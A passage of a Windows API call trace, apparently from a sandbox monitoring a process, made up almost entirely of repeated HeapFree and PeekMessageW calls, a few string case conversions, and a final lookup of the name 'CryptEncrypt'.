lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.500] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.500] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.501] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.501] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.501] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.501] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.501] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.501] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.502] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.502] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.502] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.502] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.503] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.503] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.503] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.503] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.504] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.504] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.504] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.505] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0266.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.506] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.506] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.506] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.506] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0266.506] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c9738 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.512] WideCharToMultiByte (in: 